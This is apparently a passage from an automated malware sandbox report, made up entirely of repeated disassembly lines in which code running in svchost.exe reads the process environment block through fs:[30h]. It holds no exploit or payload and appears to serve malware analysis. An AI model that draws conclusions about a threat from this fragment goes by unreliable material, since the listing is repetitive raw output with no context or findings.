            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]6_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]6_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]6_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_035062D6 mov eax, dword ptr fs:[00000030h]6_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034402E1 mov eax, dword ptr fs:[00000030h]6_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034402E1 mov eax, dword ptr fs:[00000030h]6_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034402E1 mov eax, dword ptr fs:[00000030h]6_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E284 mov eax, dword ptr fs:[00000030h]6_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E284 mov eax, dword ptr fs:[00000030h]6_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B0283 mov eax, dword ptr fs:[00000030h]6_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B0283 mov eax, dword ptr fs:[00000030h]6_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B0283 mov eax, dword ptr fs:[00000030h]6_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034402A0 mov eax, dword ptr fs:[00000030h]6_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034402A0 mov eax, dword ptr fs:[00000030h]6_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C62A0 mov ecx, dword ptr fs:[00000030h]6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C62A0 mov eax, dword ptr fs:[00000030h]6_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]6_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]6_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C4144 mov ecx, dword ptr fs:[00000030h]6_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]6_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C4144 mov eax, dword ptr fs:[00000030h]6_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342C156 mov eax, dword ptr fs:[00000030h]6_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C8158 mov eax, dword ptr fs:[00000030h]6_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436154 mov eax, dword ptr fs:[00000030h]6_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03436154 mov eax, dword ptr fs:[00000030h]6_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504164 mov eax, dword ptr fs:[00000030h]6_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504164 mov eax, dword ptr fs:[00000030h]6_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov eax, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DE10E mov ecx, dword ptr fs:[00000030h]6_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DA118 mov ecx, dword ptr fs:[00000030h]6_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DA118 mov eax, dword ptr fs:[00000030h]6_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DA118 mov eax, dword ptr fs:[00000030h]6_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DA118 mov eax, dword ptr fs:[00000030h]6_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F0115 mov eax, dword ptr fs:[00000030h]6_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03460124 mov eax, dword ptr fs:[00000030h]6_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F61C3 mov eax, dword ptr fs:[00000030h]6_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F61C3 mov eax, dword ptr fs:[00000030h]6_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]6_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]6_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]6_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]6_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE1D0 mov eax, dword ptr fs:[00000030h]6_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_035061E5 mov eax, dword ptr fs:[00000030h]6_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034601F8 mov eax, dword ptr fs:[00000030h]6_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03470185 mov eax, dword ptr fs:[00000030h]6_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EC188 mov eax, dword ptr fs:[00000030h]6_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EC188 mov eax, dword ptr fs:[00000030h]6_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D4180 mov eax, dword ptr fs:[00000030h]6_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D4180 mov eax, dword ptr fs:[00000030h]6_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]6_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]6_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]6_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B019F mov eax, dword ptr fs:[00000030h]6_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342A197 mov eax, dword ptr fs:[00000030h]6_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342A197 mov eax, dword ptr fs:[00000030h]6_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342A197 mov eax, dword ptr fs:[00000030h]6_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03432050 mov eax, dword ptr fs:[00000030h]6_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B6050 mov eax, dword ptr fs:[00000030h]6_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345C073 mov eax, dword ptr fs:[00000030h]6_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B4000 mov ecx, dword ptr fs:[00000030h]6_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D2000 mov eax, dword ptr fs:[00000030h]6_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]6_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]6_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]6_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E016 mov eax, dword ptr fs:[00000030h]6_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342A020 mov eax, dword ptr fs:[00000030h]6_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342C020 mov eax, dword ptr fs:[00000030h]6_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6030 mov eax, dword ptr fs:[00000030h]6_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B20DE mov eax, dword ptr fs:[00000030h]6_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]6_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034380E9 mov eax, dword ptr fs:[00000030h]6_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B60E0 mov eax, dword ptr fs:[00000030h]6_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342C0F0 mov eax, dword ptr fs:[00000030h]6_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034720F0 mov ecx, dword ptr fs:[00000030h]6_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343208A mov eax, dword ptr fs:[00000030h]6_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034280A0 mov eax, dword ptr fs:[00000030h]6_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C80A8 mov eax, dword ptr fs:[00000030h]6_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F60B8 mov eax, dword ptr fs:[00000030h]6_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F60B8 mov ecx, dword ptr fs:[00000030h]6_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346674D mov esi, dword ptr fs:[00000030h]6_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346674D mov eax, dword ptr fs:[00000030h]6_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346674D mov eax, dword ptr fs:[00000030h]6_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430750 mov eax, dword ptr fs:[00000030h]6_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BE75D mov eax, dword ptr fs:[00000030h]6_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472750 mov eax, dword ptr fs:[00000030h]6_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472750 mov eax, dword ptr fs:[00000030h]6_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B4755 mov eax, dword ptr fs:[00000030h]6_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438770 mov eax, dword ptr fs:[00000030h]6_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440770 mov eax, dword ptr fs:[00000030h]6_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C700 mov eax, dword ptr fs:[00000030h]6_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430710 mov eax, dword ptr fs:[00000030h]6_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03460710 mov eax, dword ptr fs:[00000030h]6_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C720 mov eax, dword ptr fs:[00000030h]6_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C720 mov eax, dword ptr fs:[00000030h]6_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346273C mov eax, dword ptr fs:[00000030h]6_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346273C mov ecx, dword ptr fs:[00000030h]6_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346273C mov eax, dword ptr fs:[00000030h]6_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AC730 mov eax, dword ptr fs:[00000030h]6_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343C7C0 mov eax, dword ptr fs:[00000030h]6_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B07C3 mov eax, dword ptr fs:[00000030h]6_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034527ED mov eax, dword ptr fs:[00000030h]6_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034527ED mov eax, dword ptr fs:[00000030h]6_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034527ED mov eax, dword ptr fs:[00000030h]6_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BE7E1 mov eax, dword ptr fs:[00000030h]6_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034347FB mov eax, dword ptr fs:[00000030h]6_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034347FB mov eax, dword ptr fs:[00000030h]6_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D678E mov eax, dword ptr fs:[00000030h]6_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034307AF mov eax, dword ptr fs:[00000030h]6_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E47A0 mov eax, dword ptr fs:[00000030h]6_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344C640 mov eax, dword ptr fs:[00000030h]6_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F866E mov eax, dword ptr fs:[00000030h]6_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F866E mov eax, dword ptr fs:[00000030h]6_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A660 mov eax, dword ptr fs:[00000030h]6_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A660 mov eax, dword ptr fs:[00000030h]6_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03462674 mov eax, dword ptr fs:[00000030h]6_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE609 mov eax, dword ptr fs:[00000030h]6_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344260B mov eax, dword ptr fs:[00000030h]6_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472619 mov eax, dword ptr fs:[00000030h]6_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E627 mov eax, dword ptr fs:[00000030h]6_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03466620 mov eax, dword ptr fs:[00000030h]6_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03468620 mov eax, dword ptr fs:[00000030h]6_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343262C mov eax, dword ptr fs:[00000030h]6_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A6C7 mov eax, dword ptr fs:[00000030h]6_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AE6F2 mov eax, dword ptr fs:[00000030h]6_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B06F1 mov eax, dword ptr fs:[00000030h]6_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B06F1 mov eax, dword ptr fs:[00000030h]6_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434690 mov eax, dword ptr fs:[00000030h]6_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03434690 mov eax, dword ptr fs:[00000030h]6_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C6A6 mov eax, dword ptr fs:[00000030h]6_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034666B0 mov eax, dword ptr fs:[00000030h]6_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438550 mov eax, dword ptr fs:[00000030h]6_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03438550 mov eax, dword ptr fs:[00000030h]6_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]6_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]6_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346656A mov eax, dword ptr fs:[00000030h]6_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C6500 mov eax, dword ptr fs:[00000030h]6_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03504500 mov eax, dword ptr fs:[00000030h]6_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440535 mov eax, dword ptr fs:[00000030h]6_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E53E mov eax, dword ptr fs:[00000030h]6_2_0345E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E5CF mov eax, dword ptr fs:[00000030h]6_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E5CF mov eax, dword ptr fs:[00000030h]6_2_0346E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034365D0 mov eax, dword ptr fs:[00000030h]6_2_034365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A5D0 mov eax, dword ptr fs:[00000030h]6_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346A5D0 mov eax, dword ptr fs:[00000030h]6_2_0346A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345E5E7 mov eax, dword ptr fs:[00000030h]6_2_0345E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034325E0 mov eax, dword ptr fs:[00000030h]6_2_034325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C5ED mov eax, dword ptr fs:[00000030h]6_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346C5ED mov eax, dword ptr fs:[00000030h]6_2_0346C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03432582 mov eax, dword ptr fs:[00000030h]6_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03432582 mov ecx, dword ptr fs:[00000030h]6_2_03432582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03464588 mov eax, dword ptr fs:[00000030h]6_2_03464588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E59C mov eax, dword ptr fs:[00000030h]6_2_0346E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]6_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]6_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B05A7 mov eax, dword ptr fs:[00000030h]6_2_034B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034545B1 mov eax, dword ptr fs:[00000030h]6_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034545B1 mov eax, dword ptr fs:[00000030h]6_2_034545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E443 mov eax, dword ptr fs:[00000030h]6_2_0346E443
